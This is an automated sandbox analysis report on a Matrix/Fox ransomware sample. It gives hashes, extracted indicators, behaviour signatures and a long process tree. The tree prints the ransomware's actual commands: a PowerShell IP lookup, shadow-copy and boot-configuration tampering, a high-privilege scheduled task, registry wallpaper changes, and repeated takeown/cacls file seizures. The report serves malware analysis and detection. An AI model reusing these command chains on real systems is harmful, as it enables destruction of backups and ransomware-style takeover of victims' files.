Overview
Resubmissions
  03-04-2024 17:37  240403-v68g6sga2w

Analysis (score 10)
  max time kernel:  141s
  max time network: 126s
  platform:         windows10-2004_x64
  resource:         win10v2004-20231215-en
  resource tags:    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  submitted:        03-04-2024 17:37
Tasks
  Static task: static1

  Behavioral task  Sample                                                                             Resource
  behavioral1      FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe  win7-20240221-en
  behavioral2      FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe  win10v2004-20240226-en
  behavioral3      FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe  win7-20240221-en
  behavioral4      FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe  win10v2004-20240226-en
  behavioral5      FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe  win7-20240221-en
  behavioral6      FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe  win10v2004-20231215-en
  behavioral7      FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe  win7-20240319-en
  behavioral8      FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe  win10v2004-20240226-en
  behavioral9      FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe  win7-20240221-en
  behavioral10     FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe  win10v2004-20240226-en
  behavioral11     FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe  win7-20240221-en
  behavioral12     FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe  win10v2004-20240226-en
General
  Target: FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
  Size:   1.2MB
  MD5:    268360527625d09e747d9f7ab1f84da5
  SHA1:   09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
  SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
  SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
  SSDEEP: 24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
  Extracted: http://myexternalip.com/raw
  Extracted: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#FOX_README#.rtf
    https://bitmsg.me
    https://bitmsg.me/users/sign_up
    https://bitmsg.me/users/sign_in
Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  pid   Process
  7892  bcdedit.exe
  7908  bcdedit.exe

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  151   4692  powershell.exe

Drops file in Drivers directory (1 IoC)
  description   ioc                                         Process
  File created  C:\Windows\system32\Drivers\PROCEXP152.SYS  yMelI2Cu64.exe

Sets service image path in registry (2 TTPs, 1 IoC)
  description      ioc                                                                                                                          Process
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"  yMelI2Cu64.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation  wscript.exe
Executes dropped EXE (64 IoCs)
Modifies file permissions (1 TTP, 64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops desktop.ini file(s) (27 IoCs)
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  150   myexternalip.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  description      ioc                                                                                                                                               Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\u1Aercwu.bmp"  reg.exe
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7412 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7456 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4692 powershell.exe 4692 powershell.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5712 yMelI2Cu64.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

[1] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe (PID 832)
  command line: "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
  - Matrix Ransomware
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\cmd.exe (PID 1684)
    command line: "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWMrNpDd.exe"

  [2] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWMrNpDd.exe (PID 4932)
    command line: "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWMrNpDd.exe" -n
    - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 4316)
    command line: "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\JOUprH0V.txt"
    - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4692)
      command line: powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SysWOW64\cmd.exe (PID 2528)
    command line: "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u1Aercwu.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\reg.exe (PID 3264)
      command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u1Aercwu.bmp" /f
      - Sets desktop wallpaper using registry

    [3] C:\Windows\SysWOW64\reg.exe (PID 7172)
      command line: reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f

    [3] C:\Windows\SysWOW64\reg.exe (PID 7244)
      command line: reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f

  [2] C:\Windows\SysWOW64\cmd.exe (PID 4588)
    command line: "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yj8mATiX.vbs"
    - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\wscript.exe (PID 2348)
      command line: wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yj8mATiX.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe (PID 6456)
        command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wiCcwVPm.bat" /sc minute /mo 5 /RL HIGHEST /F
        - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\schtasks.exe (PID 7412)
          command line: schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wiCcwVPm.bat" /sc minute /mo 5 /RL HIGHEST /F
          - Creates scheduled task(s)

      [4] C:\Windows\SysWOW64\cmd.exe (PID 2680)
        command line: "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
        - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\schtasks.exe (PID 5156)
          command line: schtasks /Run /I /tn DSHCA

  [2] C:\Windows\SysWOW64\cmd.exe (PID 5236)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
    - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cacls.exe (PID 7148)
      command line: cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 1056)
      command line: takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7584)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "store.db" -nobanner
      - Suspicious use of WriteProcessMemory

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 5636)
        command line: yMelI2Cu.exe -accepteula "store.db" -nobanner
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        [5] C:\Users\Admin\AppData\Local\Temp\yMelI2Cu64.exe (PID 5712)
          command line: yMelI2Cu.exe -accepteula "store.db" -nobanner
          - Drops file in Drivers directory
          - Sets service image path in registry
          - Executes dropped EXE
          - Enumerates connected drives
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: LoadsDriver
          - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SysWOW64\cmd.exe (PID 976)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 3124)
      command line: cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 3740)
      command line: takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
      - Modifies file permissions

    [3] C:\Windows\SysWOW64\cmd.exe (PID 3784)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "classes.jsa" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 5660)
        command line: yMelI2Cu.exe -accepteula "classes.jsa" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 5680)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 3260)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 5276)
      command line: cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 7004)
      command line: takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"

    [3] C:\Windows\SysWOW64\cmd.exe (PID 6052)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "store.db" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 3508)
        command line: yMelI2Cu.exe -accepteula "store.db" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 6580)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 6588)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 4576)
      command line: cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 5944)
      command line: takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"

    [3] C:\Windows\SysWOW64\cmd.exe (PID 5988)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "ActivitiesCache.db" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 1528)
        command line: yMelI2Cu.exe -accepteula "ActivitiesCache.db" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 5980)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 5964)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 5820)
      command line: cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 7624)
      command line: takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7600)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "AssemblyList_4_client.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 4768)
        command line: yMelI2Cu.exe -accepteula "AssemblyList_4_client.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 4296)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 6612)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 2476)
      command line: cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 6232)
      command line: takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 5064)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "behavior.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 6440)
        command line: yMelI2Cu.exe -accepteula "behavior.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 5616)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 3320)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 2500)
      command line: cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 5456)
      command line: takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7192)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 6200)
        command line: yMelI2Cu.exe -accepteula "resource.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 4840)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 5432)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 6100)
      command line: cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 2460)
      command line: takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 6128)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftLync2010.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 6272)
        command line: yMelI2Cu.exe -accepteula "MicrosoftLync2010.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 6276)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 6248)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 6192)
      command line: cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 6048)
      command line: takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7248)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 3116)
        command line: yMelI2Cu.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 7304)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 696)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 7296)
      command line: cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 7436)
      command line: takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7364)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 7480)
        command line: yMelI2Cu.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 7420)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 7636)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 7336)
      command line: cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 7884)
      command line: takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7960)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 8044)
        command line: yMelI2Cu.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 7668)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 280)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 8048)
      command line: cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 7744)
      command line: takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 7892)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "OfficeIntegrator.ps1" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 7732)
        command line: yMelI2Cu.exe -accepteula "OfficeIntegrator.ps1" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 7932)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 7936)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 7988)
      command line: cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 7972)
      command line: takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 8000)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 8016)
        command line: yMelI2Cu.exe -accepteula "resource.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 6644)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 8108)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""

    [3] C:\Windows\SysWOW64\cacls.exe (PID 8176)
      command line: cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C

    [3] C:\Windows\SysWOW64\takeown.exe (PID 6292)
      command line: takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
      - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe (PID 5476)
      command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner

      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 528)
        command line: yMelI2Cu.exe -accepteula "resource.xml" -nobanner
        - Executes dropped EXE

    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe (PID 3388)
      command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
      - Executes dropped EXE

  [2] C:\Windows\SysWOW64\cmd.exe (PID 3180)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:6952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:6720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵
- Executes dropped EXE
PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:6676
-
